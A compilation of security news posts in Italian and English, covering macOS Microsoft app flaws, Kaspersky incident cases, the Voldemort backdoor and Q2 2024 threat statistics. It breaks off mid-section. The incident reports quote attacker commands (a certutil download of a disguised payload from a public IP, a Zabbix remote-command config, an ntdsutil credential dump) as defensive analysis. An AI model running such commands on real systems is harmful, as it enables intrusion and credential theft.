I ricercatori di sicurezza hanno scoperto otto nuove vulnerabilità nelle versioni macOS delle applicazioni Microsoft (Outlook, Teams, Word, Excel, PowerPoint e OneNote), che, se sfruttate, consentono agli aggressori di aumentare i diritti e ottenere l’accesso a dati riservati.

Secondo una descrizione di Cisco Talos, i difetti identificati aiutano a bypassare le impostazioni sulla privacy nel sistema operativo, che sono basate sul framework TCC (Trasparenza, Consenso e Controllo).

“Se un aggressore sfrutta le vulnerabilità scoperte, potrà ottenere tutti i diritti concessi da Microsoft sulle applicazioni interessate”, scrivono gli esperti .

“Ad esempio, un utente malintenzionato potrebbe inviare e-mail dall’account della vittima, nonché registrare audio e video, senza alcuna interazione con l’utente preso di mira.” hanno aggiunto.

In teoria, un utente malintenzionato può inserire librerie dannose in una qualsiasi di queste applicazioni, cosa che gli permetterà non solo di ottenere i diritti di quest’ultima, ma anche di estrarre una serie di dati riservati. Come notano gli esperti, per uno sfruttamento efficace l’aggressore deve già avere un certo accesso al sistema della vittima.

TCC e protezione dei dati

TCC applica una politica che richiede alle applicazioni di ottenere il consenso esplicito dell’utente prima di poter accedere a risorse protette quali contatti, calendari, foto e posizione, garantendo che gli utenti mantengano il controllo diretto sulle proprie informazioni personali e sull’accessibilità dei propri dati alle applicazioni.

TCC opera congiuntamente agli entitlement, che sono un set di capacità richieste per la funzionalità di un’app. Gli sviluppatori scelgono questi entitlement da una selezione fornita da Apple e, sebbene solo un sottoinsieme di tutti i possibili entitlement sia disponibile per l’uso generale, i più potenti sono riservati esclusivamente alle applicazioni e ai binari di sistema di Apple.

Quando un’applicazione con diritti specifici richiede inizialmente l’utilizzo di una specifica funzionalità, viene visualizzato un pop-up di autorizzazione.

L’immagine sopra mostra un esempio di tale richiesta di autorizzazione: “Malevolent App” vorrebbe accedere alla telecamera. L’utente deve decidere se consentire o negare l’accesso alla telecamera. Questa decisione viene quindi registrata nel database TCC.

Una volta che l’utente ha fatto la sua scelta, qualsiasi futura richiesta relativa alla telecamera da parte della “Malevolent App” sarà regolata dalla decisione registrata nel database. Questo sistema consente effettivamente agli utenti di controllare ed essere informati delle azioni sensibili alla privacy che un’applicazione intende eseguire. La necessaria interazione dell’utente è ciò che consente agli utenti di impedire alle applicazioni dannose di eseguire azioni sensibili come la registrazione di un video o lo scatto di foto.

Un utente può successivamente verificare questa autorizzazione nella sezione “Privacy e sicurezza” delle “Impostazioni di sistema” di macOS. Lì, è possibile trovare un elenco di autorizzazioni, tra cui Fotocamera, Microfono e Servizi di localizzazione.

L'articolo Le App Microsoft su macOS possono essere utilizzate per accedere ai dati riservati dell’Utente proviene da il blog della sicurezza informatica.

Da un sondaggio globale commissionato da Kaspersky Lab è emerso che il 41% delle aziende ha un disperato bisogno di specialisti della sicurezza informatica. Gli esperti in minacce alla sicurezza informatica e gli specialisti nell’analisi del malware sono i più richiesti (39% ciascuno).

C’è anche una carenza di analisti SOC (35%), specialisti di pentest e sicurezza di rete (33%) e analisti di Threat Intelligence (32%). Se suddivisa per settore, la carenza di personale addetto alla sicurezza informatica è più avvertita nel settore pubblico, dove quasi la metà dei posti vacanti non viene occupata (46%).

Al secondo posto in questa classifica si trovano telecomunicazioni e media (39%), al terzo posto vendita al dettaglio e sanità (37% ciascuno). L’area della sicurezza informatica è meglio coperta nel settore IT e finanziario (rispettivamente 31 e 27%).

L’indagine, condotta da Grand View Research in 29 paesi, ha coinvolto 1.012 rappresentanti aziendali che ricoprono varie posizioni: manager (IT, SOC), principali specialisti, esperti di sicurezza informatica.

“Vediamo una forte domanda, in particolare, di ingegneri per l’implementazione della sicurezza informatica e analisti SOC, nonché di specialisti nello sviluppo della sicurezza”, ha affermato Vladislav Galimov, capo del gruppo di reclutamento per la sicurezza informatica di Kaspersky.

“Inoltre, crediamo che nel prossimo futuro inizierà a crescere la necessità di esperti nel campo dell’intelligenza artificiale e della sicurezza delle reti neurali”. Risultati simili sono stati ottenuti da uno studio simile sul mercato del lavoro nel campo della sicurezza informatica , condotto da Angara Security .

Secondo il fornitore di servizi, lo scorso anno il numero dei posti vacanti nel settore della sicurezza informatica è aumentato del 27%.

Secondo gli esperti, la crescente carenza di personale addetto alla sicurezza informatica è direttamente collegata al percorso generale verso la digitalizzazione dell’economia e all’inasprimento dei requisiti normativi in ​​materia di sicurezza di fronte all’aumento del numero e della complessità degli attacchi informatici .

L'articolo Esperti di sicurezza? Siete i più richiesti! Nella PA, il 46% delle posizioni in Cybersecurity è vacante proviene da il blog della sicurezza informatica.

In 2023, Kaspersky’s Global Emergency Response Team (GERT) participated in services around the world that allowed our experts to gain insight into various threats and techniques used by APT groups, common crimeware and, in some cases, internal adversaries. As we highlighted in our annual report, the most prominent threat in 2023 was ransomware, and the Government vertical was the sector that most frequently requested digital forensics, incident response and malware analysis (DFIRMA) services. While file encryption was the most common threat last year, this post proposes a deep dive into specific cases that caught our attention and were mentioned during our annual DFIRMA report webinar.

The insider fraud attack

A group of collaborators at a government organization identified an internal service that allowed the creation of legitimate transactions that weren’t direct money transfers, but could result in monetary losses for the organization. These losses could reach millions of dollars.

The following scenario (not related to a specific customer) could be considered an example of such misuse of an internal service:

A bank only allows a customer to open a maximum of two bank accounts for free, with the customer paying a fee to open additional accounts. However, the adversary used the internal system to create multiple bank accounts for individual customers, who avoided paying the required fees in exchange for a payment to the adversary. As a result of this incident, the organization reported a loss of more than $20 million.

Many logs related to the application in question, as well as VPN access and network activity, were requested for analysis and the employees involved in the fraudulent activity were identified. Two different cases were analyzed in which the abuse of transaction configuration was confirmed, one by exploiting a vulnerability in a debugging interface and the other by misusing privileges in a valid account.

In the first case, GERT identified a misconfiguration that was abused by the adversaries to steal cookies from other users to impersonate them and their activity. An application on one of the analyzed systems registered exception logging details that included cookies for the user that encountered the exception, allowing us to determine the user involved.

In the other case, one of the users modified the privileges and details of another user, impersonating that user to create additional transactions in the internal service and attempting to hide the original details. Later, this newly modified user accessed the VPN from a previously known system where another user was accessing the transaction system for what was initially catalogued as legitimate activity, but which was recently confirmed to be part of the malicious activity.

Most of the criminal activity was performed by accessing the infrastructure through the VPN, but it was discovered that a new user was accessing the transaction system from the internal network using the same unauthorized behavior.

The results of the GERT team’s analysis confirmed the collusion of a user involved in the transaction requests and managed to identify the sources and link the user activity to various systems involved in the investigation, including local and remote IDs. This information was used by the customer in a timely manner to take legal action against the insider employee and his accomplices.

Mitre ATT&CK techniques

Flax Typhoon/SLIME13 APT attack

After enabling Kaspersky Managed Detection and Response (MDR) in a customer’s infrastructure, our platforms detected the presence of well-known software installed on the customer’s premises without their knowledge.

Although these applications were legitimate, attackers used them to gain persistent access to the victim’s environment.

In September 2023, Kaspersky MDR detected a suspicious service on a corporate host. The adversaries used a technique that mimicked the real system application name conhost.exe, but the service was started from a non-standard folder. GERT’s analysis confirmed that the application wasn’t a system service, but was instead associated with SoftEther VPN, a legitimate multi-protocol VPN software.

The supposed conhost application was downloaded to the system by a legitimate local user using the well-known Windows LOLBin certutil, and then installed via command line as a system service:
certutil.exe -urlcache -split -f hxxp://<Public IP>/conhost.exe
Another suspicious service masquerading as wshelper.dll was observed on another host. This DLL was associated with Zabbix agent, which is typically deployed on a monitoring target to actively monitor local resources and applications.

Analysis of the sample confirmed that the configuration file was set to allow remote commands, taking advantage of passive and active checks enabled by Zabbix.
EnableRemoteCommands=1
LogFile=0
Server=0.0.0.0/0
ListenPort=5432
Port 5432 was configured in a firewall rule to allow listening, with the “smart” name PGSQL to make it look legitimate.

GERT’s analysis confirmed that the intrusion lasted more than two years. In the early stages of the attack, an NTDS dump was created using system commands:
cmd /c ntdsutil "ac i ntds" ifm "create full c:\PerfLogs\test" q q
c:\windows\sysvol\domain\ntds\active directory\ntds.dit"
During those two years of intrusion, security controls detected and contained multiple attempts to execute pentesting applications such as Mimikatz and CobaltStrike, but all the repurposed legitimate software remained invisible until the customer decided to implement our MDR solution. GERT analysis confirmed that the infrastructure had been compromised since mid-2021. The artifacts and TTPs of the attackers are similar to those used by the Flax Typhoon APT group, which employs minimal malware and custom payloads, but relies heavily on legitimate applications instead.

Mitre ATT&CK techniques

The MFA lack of control

After enabling multi-factor authentication (MFA) for its “critical employees”, a financial company was targeted by a spear-phishing attack.

The phishing attack spoofed the popular DocuSign platform and was directed at a specific group of employees. Although the company detected the phishing attack and configured rules to avoid receiving similar emails, some users received and opened the malicious email.

Among those who unwittingly opened the link was one of the protected users. The attackers were able to take control of his account thanks to the implementation of a phishing kit configured to automatically steal the MFA tokens.

The initial phishing attack occurred on October 6, 2023, and GERT analysts confirmed that one of the targeted users opened the malicious email the same day, which was followed by new connections opened from different locations outside the company’s headquarters. The attackers also configured additional MFA devices to access the target user’s mailbox contents without being noticed and without tampering with the original mailbox.

The attackers accessed the contents of the mailbox for a few days, allowing them to understand internal processes and prepare a BEC attack.

One month after the initial access, the attackers compromised a privileged email account (where MFA was not enabled). This new account had privileges in Microsoft 365, which allowed new rules and parameters to be configured. The attackers configured “send as” privileges on behalf of critical users, such as money transfer approvers and requesters. The adversaries also used this account to configure forwarding rules to hide messages received from a specific bank and from specific users.

Once the necessary privileges and rules were configured, the attackers sent a new email request using a legitimate template previously used in the company to request money transfers and attached documents collected from the original compromised account, but with a different destination bank account, requesting an international transfer of more than $300,000.

Upon receiving the request, the bank processed the transfer as usual based on the legitimate source and attached documents.

A notification was sent to the customer from an email address belonging to the bank, confirming the transfer. However, this email address wasn’t listed in the attackers’ forwarding rules, so the message was delivered to the customer’s mailbox. After receiving this message, the customer decided to investigate the user responsible for the privileged mail account.

GERT’s analysis confirmed the initial attack date and vector, the compromised users, and all the techniques used by the threat actors, and provided a set of recommendations for protecting and monitoring cloud assets. By analyzing user access logs (UAL) and additional cloud logs, as well as firewall logs and the client’s own system logs, GERT was able to provide a complete timeline detailing all the techniques used by the fraudsters.

Mitre ATT&CK techniques

ToddyCat-like APT attack with an ICMP backdoor

Kaspersky’s Managed and Detection Response service (MDR) was alerted to suspicious activity on domain controllers and Exchange servers.

GERT was contacted to investigate the case; our analysis confirmed SMB abuse and IKEEXT service exploitation, as well as exploitation of the Microsoft Exchange server remote code execution vulnerability (CVE-2021-26855).

One interesting finding was the use of IKEEXT for persistence. The vulnerability used by the attackers, along with the exploit for it, was first published by High-Tech Bridge Security Research Lab in 2012. It was associated with the wlbsctrl.dll library and originally used for privilege escalation. Shortly after the exploit was published, Microsoft patched the vulnerability. However, our analysts confirmed that the same library is now being used as a persistence mechanism for malware.

IKEEXT is a default service on Windows. It is invoked by the svchost process, which loads ikeext.dll, the DLL responsible for the IKEEXT service.

The ikeext.dll library, in turn, is responsible for loading a DLL named wlbsctrl.dll, which is default Windows behavior. However, while the svchost service always runs on the system, wlbsctrl.dll does not exist in the file system by default, and this where threat actors saw an opportunity.

The threat actors created a malicious version of wlbsctrl.dll and saved it on the system. Based on Windows behavior, this DLL was executed every time without requiring registration in Autorun, which is commonly used for persistence.

Besides persistence, in the investigated incident the threat actor used the IKEEXT vulnerability to perform lateral movement via the SMB protocol and created a custom firewall rule named DLL Surrogate that permits dllhost.exe to listen on custom port 52415. All this was achieved by placing the backdoored wlbsctrl.dll into the system32 folder where the legitimate library is normally stored (if present on the system).

Later, the attacker implemented an ICMP backdoor. Once the backdoor was identified, Kaspersky verified and detected two more in-the-wild samples outside the customer’s infrastructure. All the discovered samples were similar except for the following points:

• Some differences in the PE header (normal behavior between similar samples);
• Different mutex strings, all located at the same raw file offset;
• Different bytes at the raw file offset 0x452–0x483, which are apparently useless (non-actionable) code.

Based on GERT’s analysis, the backdoor acted like a loader, configured to execute the following activities:

• Check for the mutex; if it already exists in memory, terminate the process.
• Attempt to read the file %WINDIR%\Microsoft.NET\Framework\sbs_clrhost.res; decrypt its contents using the AES algorithm with a hardcoded KEY and a KEY derived from the volume serial number (VSN) of the C drive, then use it to set the value of the registry key “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, and then delete the file.
• Load the contents of the default value of registry key “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, decrypt it again with AES using the same KEY described above, and invoke the payload shellcode.
• Allocate the shellcode size in a new segment and jump to it.

Note: The calculated REGKEY NAME (Interface {<calculated_for_each_host>}) is based on the VSN of the C drive (without host VSN it is not possible to decrypt correctly).

As part of the analysis, GERT identified a payload stored in the Windows registry and analyzed it, confirming the following behavior in the encrypted payload.

The decrypted payload has the header “CAFEBABE” (hex bytes magic related to Java Class files) followed by the shellcode size and finally the data. This payload executes the following commands:

1. Decrypt itself (for the third time);
2. If not running under exe, create a suspended dllhost process with the parameter “/Processid: {02D4B3F1-FD88-11D1-960D-00805FC79235}”, which refers to a COM+ system application service;
3. Allocate space to the new process;
4. Write a section of the decrypted payload (starting at offset 0x1A03, and having a size that’s contained in the small header at offset 0x19FF) into the new allocation;
5. Patch dllhost (in memory only) to ensure execution at the newly allocated space;
6. Resume the dllhost process.

A new instance of the shellcode starts from step one. It finds that it is actually running under dllhost, decrypts a new section, executes it and listens on port 52415. The final payload injected into dllhost.exe appears to create a raw ICMP socket with no port. No outbound connection is made (although the received payload likely communicates outbound). Data is received from an unknown source in a Base64-encoded ICMP packet, converted to binary, decrypted, and executed via direct execution of data (allocating space using the VirtualAlloc function), copying shellcode to the allocated space, making a direct call to the allocated space.

According to our threat intelligence platforms, this threat has similarities to APT attacks: the attack Tactics, Techniques and Procedures (TTP) used are very similar to the ToddyCat actor, but there’s no solid attribution to this group.

The objective of the threat actor was to gain persistence for monitoring and future impact, but no other objectives were confirmed based on the evidence obtained.

Mitre ATT&CK techniques

Conclusions

Although statistics show the government sector was the most targeted vertical last year, it is clear that threat and crimeware actors do not care which vertical their potential targets belong to. To stay ahead of the attackers, the best course of action is to assess your asset inventory and continue to monitor and protect it.

The trend of cyberattacks and intrusions making use of infrastructure assets or legitimate on-premises applications creates the need to enable additional layers of monitoring based on threat intelligence. The implementation of MDR has been one of the recurring triggers for new investigations thanks to its detection capabilities and the ability of analysts to determine timely courses of action.

To learn more about our Incident Response report, we invite you to view the recording of the webinar “Analyzing last year’s cyber incident cases”.

securelist.com/incident-respon…

With as cheap and versatile as RTL-SDR devices are, it’s a good idea to have a couple of them on hand for some rainy day hacking. In fact, depending on what signals you’re trying to sniff out of the air, you may need multiple interfaces anyway. Once you’ve amassed this arsenal of software defined radios, you may find yourself needing a way to transport and deploy them. Luckily, [Jay Doscher] has you covered.

His latest creation, the SDR SOLO, is a modular system for mounting RTL-SDRs. Each dongle is encased in its own 3D printed frame, which not only protects it, but makes it easy to attach to the base unit. To keep the notoriously toasty radios cool, each frame has been designed to maximize airflow. You can even mount a pair of 80 mm fans to the bottom of the stack to really get the air moving. The current design is based around the RTL-SDR Blog V4, but could easily be adapted to your dongle of choice.

In addition to the row of SDR dongles, the rig also includes a powered USB hub. Each radio connects to the hub via a short USB cable, which means that you’ll only need a single USB cable running back to your computer. There’s also various mounts and adapters for attaching antennas to the system. Stick it all on the end of a tripod, and you’ve got a mobile radio monitoring system that’ll be the envy of the hackerspace.

As we’ve come to expect, [Jay] put a lot of thought and effort into the CAD side of this project. Largely made of 3D printed components, his projects often feature a rugged and professional look that really stands out.

hackaday.com/2024/09/03/portab…

Benvenuti alla nostra serie di articoli dedicati alla cybersecurity per le Piccole e Medie Imprese (PMI)! In un mondo sempre più digitale, la sicurezza informatica è diventata una priorità fondamentale per tutte le aziende. Tuttavia, le PMI spesso non dispongono delle risorse o delle competenze necessarie per affrontare adeguatamente le minacce informatiche.

Questa serie di 12 articoli è stata pensata per fornire informazioni pratiche e accessibili che ti aiuteranno a proteggere la tua azienda. Ogni articolo approfondirà un aspetto specifico della cybersecurity, offrendo consigli utili, strategie e best practice per migliorare la tua postura di sicurezza. Dall’aggiornamento del software alla protezione della rete wireless, dalla formazione dei dipendenti alla gestione delle minacce come il ransomware e il phishing, copriremo tutti i punti essenziali per aiutarti a mantenere la tua azienda sicura.

Iniziamo con i fondamenti della cybersecurity, un punto di partenza essenziale per comprendere l’importanza di proteggere i tuoi dati e dispositivi. Continua a seguirci per scoprire come mettere in pratica queste raccomandazioni e fare della sicurezza informatica una parte integrante della tua attività quotidiana.

Non importa se sei una piccola azienda di biscotti artigianali o un colosso della tecnologia, i cybercriminali non fanno distinzione. Non vorrai mica che il tuo piccolo regno venga violato da qualche hacker affamato di dati, vero? Segui questi semplici consigli per trasformare la tua PMI in una fortezza digitale.

Proteggi i tuoi File e Dispositivi

Aggiorna il Software

Se pensi che aggiornare il software sia noioso come guardare la vernice che asciuga, ripensaci. Gli aggiornamenti automatici sono come il burro sulle tue fette biscottate di sicurezza.

Windows update

Aggiornamento automatico app Android

Aggiornamenti automatici su IPhone

Update automatici su Ubuntu

Aggiornamenti automatici du Debian

Metti al Sicuro i tuoi File

Backup, backup, backup! Esegui il backup dei tuoi file importanti offline, su un disco rigido esterno o nel cloud. E per l’amor del cielo, chiudi a chiave i tuoi documenti cartacei su un armadietto.. Usa la regola dei backup 3-2-1 che è piuttosto semplice da spiegare. L’idea è che tu abbia tre copie dei tuoi file: una su cui lavori e due per scopi di backup. Queste due copie di backup sono conservate su supporti diversi e una di esse è fuori sede.

Crediti Proton

Richiedi Password Sicure

Usi la password “12345”?? Sei serio? Piuttosto usa password forti per tutti i dispositivi. E no, non scriverle su un post-it attaccato al monitor, ti prego!

Questa ad esempio è la tabella che mostra i tempi di rilevamento di una password usando tecniche di forza bruta variando tipi di carattere della password e lunghezza.

Cripta i Dispositivi

Cripta tutto, dal laptop al frigorifero smart se necessario. I dati sensibili devono essere protetti come il segreto della Coca-Cola. Ad esempio potresti utilizzare una chiavetta usb con bitLocker per bloccare e sbloccare il tuo hard disk con i dati da proteggere.

Usa l’Autenticazione a Più Fattori (MFA)

Un ulteriore strato di sicurezza, come un codice temporaneo sullo smartphone. Gli hacker dovranno lavorare molto di più per rubare i tuoi dati. Usare una autenticazione a più fattori è differente da un autenticazione a 2 fattori (2FA) perchè in questo ultimo caso ti saranno chiesti due codici ad esempio una password e un codice. Nell’autenticazione a più fattori dovrai utilizzare due tra:

• Qualcosa che sai: I fattori di autenticazione basati sulla conoscenza, come la password, richiedono all’utente di ricordare un segreto che verrà digitato nella pagina di autenticazione.
• Qualcosa che hai: I fattori di autenticazione basati sul possesso richiedono che l’utente sia in possesso di un particolare oggetto, come uno smartphone, una smartcard o un token di autenticazione fisico (come uno Yubikey).
• Qualcosa che sei: I fattori di autenticazione basati sull’inerenza identificano un utente in base ad attributi unici come le impronte digitali, le impronte vocali o il riconoscimento facciale.

Proteggi la tua Rete Wireless

Proteggi il tuo Router

Cambia il nome e la password di default. Spegni la gestione remota e non dimenticare di uscire come amministratore. Il router non è un giocattolo, trattalo con rispetto.

Usa la Criptazione WPA2/WPA3

Assicurati che il tuo router utilizzi almeno il protocollo di sicurezza WPA2. Vuoi proteggere le informazioni che invii sulla tua rete? Bene, allora attiva la criptazione dei tuoi dati trasmessi e una fase di autenticazione più robusta con WPA3!

Pratiche di Sicurezza Intelligenti

Limita i Tentativi di Accesso

Restringi il numero di tentativi di accesso non riusciti. Gli hacker non dovrebbero avere infiniti tentativi di indovinare la tua password. Tutti i servizi che configuri impostali in modo che la password possa scadere e che i tentativi di accesso siano limitati.

Forma il tuo Staff

Sì, anche tuo cugino che lavora part-time. Esegui regolarmente sessioni di formazione sulla sicurezza per tutti i dipendenti. La sicurezza deve essere parte della cultura aziendale.I temi come le tecniche di attacco di ingegneria sociale, l’autenticità dei messaggi, l’autorevolezza delle fonti, la pec e lo spid devono fare parte della nostra competenza digitale di base.

Prepara un Piano

Sviluppa un piano per salvare i dati, mantenere le operazioni e notificare i clienti in caso di violazione. Non farti trovare impreparato come uno scoiattolo in autostrada.

Ricapitolando questi sono i passi pratici da seguire

• Backup Regolari: Assicurati che i backup siano effettuati regolarmente e siano archiviati in modo sicuro.
• Aggiornamenti Automatici: Imposta i sistemi per aggiornarsi automaticamente. Non vuoi diventare l’anello debole della sicurezza.
• Formazione dei Dipendenti: Conduci regolarmente sessioni di formazione sulla sicurezza per tutto il personale. Non lasciare che l’ignoranza sia il tuo nemico.
• Sicurezza Fisica: Chiudi a chiave dispositivi e file cartacei contenenti informazioni sensibili. Non è una cosa difficile, davvero.
• Autenticazione a più fattori: Implementa l’MFA ovunque possibile. Più strati di sicurezza, meno notti insonni.

Seguendo queste regole fondamentali, le piccole e medie imprese possono migliorare significativamente la loro postura di sicurezza informatica e proteggersi dalle minacce potenziali. Ricorda, la cybersecurity non è un compito unico, ma un processo continuo che richiede vigilanza e aggiornamenti regolari.

L'articolo Ritorno alle Basi: Fondamenti di Cybersecurity per le PMI (1/12) proviene da il blog della sicurezza informatica.

Proofpoint riferisce che una nuova campagna malware sfrutta Fogli Google per gestire la backdoor Voldemort, progettata per raccogliere informazioni e fornire payload aggiuntivi.

Gli aggressori si spacciano per autorità fiscali in Europa, Asia e Stati Uniti e hanno già attaccato più di 70 organizzazioni in tutto il mondo. Gli hacker compongono le e-mail di phishing in modo tale che corrispondano alla posizione di una determinata organizzazione (per questo gli aggressori si affidano a fonti aperte). Tali messaggi presumibilmente contengono informazioni fiscali aggiornate e collegamenti a documenti pertinenti.

Secondo il rapporto dei ricercatori, la campagna è iniziata il 5 agosto 2024 e gli hacker hanno già inviato più di 20.000 e-mail (fino a 6.000 al giorno). Gli aggressori prendono di mira settori quali assicurazioni, aerospaziale, trasporti, università, finanza, tecnologia, produzione, sanità, automobilistico, ospitalità, energia, governo, media, telecomunicazioni e così via.

Non è chiaro chi si nasconda dietro questa campagna, ma gli esperti di Proofpoint ritengono che l’obiettivo più probabile degli aggressori sia lo spionaggio informatico.

Facendo clic sul collegamento nell’e-mail, i destinatari vengono indirizzati a una pagina di destinazione ospitata da InfinityFree, che utilizza gli URL della cache AMP di Google per reindirizzare le vittime a una pagina con un pulsante “Fai clic per visualizzare il documento”.

Quando si fa clic sul pulsante, la pagina controlla l’User Agent del browser e, se associato a Windows, reindirizza la vittima all’URI search-ms (Windows Search Protocol), che punta all’URI tunneled di TryCloudflare. Gli utenti non Windows vengono reindirizzati a un URL di Google Drive vuoto che non contiene contenuti dannosi.

Se la vittima interagisce con il file search-ms, Esplora risorse visualizza un file LNK o ZIP mascherato da PDF. L’uso dell’URI search-ms è recentemente diventato popolare nelle campagne di phishing perché un file di questo tipo, ospitato su una condivisione WebDAV/SMB esterna, fa apparire come se fosse nella cartella Download locale, invogliando la vittima ad aprirlo.

Di conseguenza, sul computer della vittima viene eseguito uno script Python da un’altra risorsa WebDAV, che raccoglie informazioni di sistema per compilare un profilo. Allo stesso tempo, viene visualizzato un file PDF progettato per mascherare attività dannose.

Lo script carica anche l’eseguibile Cisco WebEx (CiscoCollabHost.exe) e una DLL dannosa (CiscoSparkLauncher.dll) per caricare Voldemort utilizzando il sideloading DLL.

Voldemort stesso è una backdoor scritta in linguaggio C che supporta un’ampia gamma di comandi e azioni sui file, inclusi il furto, l’inserimento di nuovi payload nel sistema e l’eliminazione dei file.

Una caratteristica distintiva di Voldemort è che il malware utilizza Google Sheet come server di controllo, ricevendo nuovi comandi tramite “Sheets” da eseguire sul dispositivo infetto e utilizzandoli anche come archivio per i dati rubati.

Pertanto, ogni macchina infetta registra i propri dati in specifiche celle di Fogli Google, che possono essere identificate da identificatori univoci come l’UUID, che garantisce l’isolamento e la gestione trasparente dei sistemi compromessi.

Per interagire con Fogli Google, Voldemort utilizza l’API di Google con un ID client integrato, un token di aggiornamento, che vengono archiviati nelle sue impostazioni crittografate.

Come notano gli esperti, questo approccio fornisce al malware un canale di controllo affidabile e altamente disponibile e riduce anche la probabilità che questa attività di rete venga notata dalle soluzioni di sicurezza. Poiché Fogli Google è ampiamente utilizzato nelle aziende, anche il blocco del servizio sembra poco pratico.

L'articolo Il Malware Voldemort sfrutta i Fogli di calcolo Google per Attacchi Globali proviene da il blog della sicurezza informatica.

The statistics presented here are based on detection verdicts by Kaspersky products and services received from users who consented to providing statistical data.

Quarterly figures

In Q2 2024:

• Kaspersky solutions blocked over 664 million attacks from various internet sources.
• The web antivirus reacted to 113.5 million unique URLs.
• The file antivirus blocked over 27 million malicious and unwanted objects.
• Almost 86,000 users encountered ransomware attacks.
• Nearly 12% of all ransomware victims whose data was published on DLSs (data leak sites) were affected by the Play ransomware group.
• Nearly 340,000 users faced miner attacks.

Ransomware

Quarterly trends and highlights

Law enforcement successes

In April 2024, a criminal who developed a packer that was allegedly used by the Conti and Lockbit groups to evade antivirus detection was arrested in Kyiv. According to Dutch police, the arrested individual was directly involved in at least one attack using the Conti ransomware in 2021. The criminal has already been charged.

In May, a member of the REvil group, arrested back in October 2021, was sentenced to 13 years in prison and ordered to pay $16 million. The cybercriminal was involved in over 2,500 REvil attacks, resulting in more than $700 million in total damages.

In June, the FBI announced that it had obtained over 7,000 decryption keys for files encrypted by Lockbit ransomware attacks. The Bureau encourages victims to contact the Internet Crime Complaint Center (IC3) at ic3.gov.

According to the UK’s National Crime Agency (NCA) and the US Department of Justice, the Lockbit group amassed up to $1 billion in its attacks from June 2022 to February 2024.

Attacks exploiting vulnerabilities

The CVE-2024-26169 privilege escalation vulnerability, patched by Microsoft in March 2024, was likely exploited in attacks by the Black Basta group. Some evidence suggests that at the time of the exploitation, this vulnerability was still unpatched, making it a zero-day vulnerability.

In June 2024, a massive TellYouThePass ransomware attack was launched, exploiting the CVE-2024-4577 vulnerability in PHP. This attack targeted Windows servers with certain PHP configurations, including those with the default XAMPP stack. The attackers scanned public IP address ranges and automatically infected vulnerable servers, demanding 0.1 BTC as ransom. Although this is a relatively small amount, the scale of the attacks could have yielded substantial profits. In recent years, this method has not been used as frequently due to its cost for attackers, who prefer instead targeted attacks with the hands-on involvement of operators. However, in this case, the attackers employed the time-tested approach.

Most active groups

Here are the most active ransomware groups based on the number of victims added to their DLSs (data leak sites). In Q2 2024, the Play group was the most active, publishing data on 12% of all new ransomware victims. Cactus came in second (7.74%), followed by Ransom Hub (7.50%).

The percentage of victims of a particular group (according to its DLS) among victims of all groups published on all DLSs examined during the reporting period (download)

Number of new modifications

In Q2 2024, we discovered five new ransomware families and 4,456 new ransomware variants.

Number of new ransomware modifications, Q2 2023 – Q2 2024 (download)

Number of users attacked by ransomware Trojans

In Q2 2024, Kaspersky solutions protected 85,819 unique users from ransomware Trojans.

Number of unique users attacked by ransomware Trojans, Q2 2024 (download)

Geography of attacked users

Top 10 countries and territories targeted by ransomware Trojans

*Countries and territories with fewer than 50,000 Kaspersky users were excluded from the calculations.
**Percentage of unique users whose computers were attacked by ransomware Trojans out of all unique Kaspersky product users in that country or territory.

Top 10 most common families of ransomware Trojans

*Statistics are based on detection verdicts by Kaspersky products. The information was provided by Kaspersky users who consented to providing statistical data.
**Unique Kaspersky users attacked by the ransomware Trojan family as a percentage of total users attacked by ransomware Trojans.

Miners

Number of new modifications

In Q2 2024, Kaspersky products detected 36,380 new miner variants.

Number of new miner modifications, Q2 2024 (download)

Number of users attacked by miners

In Q2 2024, we detected attacks using miners on 339,850 unique Kaspersky users worldwide.

Number of unique users attacked by miners, Q2 2024 (download)

Geography of attacked users

Top 10 countries and territories targeted by miners

*Countries and territories with fewer than 50,000 Kaspersky users were excluded from the calculations.
**Percentage of unique users whose computers were attacked by miners out of all unique Kaspersky product users in that country or territory.

Attacks on macOS

In Q2 2024, numerous samples of the spyware Trojan-PSW.OSX.Amos (also known as Cuckoo) were found. This spyware is notable for requesting an administrator password through osascript, displaying a phishing window. Attackers regularly update and repackage this Trojan to avoid detection.

New versions of the LightRiver/LightSpy spyware were also discovered. This Trojan downloads modules from the server with spy and backdoor functionalities. For example, they record the screen or audio, steal browser history, and execute arbitrary console commands.

Top 20 threats to macOS

The percentage of users who encountered a certain malware out of all attacked users of Kaspersky solutions for macOS (download)

The leading active threat continues to be a Trojan capable of downloading adware or other malicious applications. Other common threats include adware and fake “system optimizers” that demand money to “fix” nonexistent issues.

Geography of threats for macOS

Top 10 countries and territories by share of attacked users

*Percentage of unique users encountering macOS threats out of all unique Kaspersky product users in that country or territory.

There has been a slight increase of 0.1–0.2 p.p. in the share of attacked users in Mexico, Hong Kong, the United Kingdom, and India. Conversely, we see a slight decline in Spain, Italy, and Germany.

IoT threat statistics

In the second quarter of 2024, the distribution of attack protocols on devices targeting Kaspersky honeypots was as follows:

Distribution of attacked services by the number of unique IP addresses of the devices carrying out the attacks, Q1–Q2 2024 (download)

The share of attacks using the Telnet protocol continued to grow, reaching 98%.

Distribution of cybercriminal sessions with Kaspersky honeypots, Q1–Q2 2024 (download)

Top 10 threats delivered to IoT devices

Share of a specific threat downloaded to an infected device as a result of a successful attack, out of the total number of downloaded threats (download)

Attacks on IoT honeypots

For SSH protocol attacks, the share of attacks from China and India increased, while activity from South Korea slightly declined.

Telnet attacks from China returned to 2023 levels, while the share from India grew.

Attacks via web resources

The statistics in this section are based on the work of the web antivirus, which protects users at the moment malicious objects are downloaded from a malicious or infected webpage. Cybercriminals intentionally create malicious pages. Web resources with user-created content (such as forums), as well as compromised legitimate sites, can also be infected.

Countries and territories that serve as sources of web-based attacks: Top 10

The following statistics show the distribution of countries and territories that were the sources of internet attacks on users’ computers blocked by Kaspersky products (webpages with redirects to exploits, sites with exploits and other malware, botnet control centers, and so on). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q2 2024, Kaspersky solutions blocked 664,046,455 attacks launched from online resources across the globe. A total of 113,535,455 unique URLs that triggered the web antivirus were recorded.

Distribution of web attack sources by country and territory (Q2 2024) (download)

Countries and territories where users faced the greatest risk of online infection

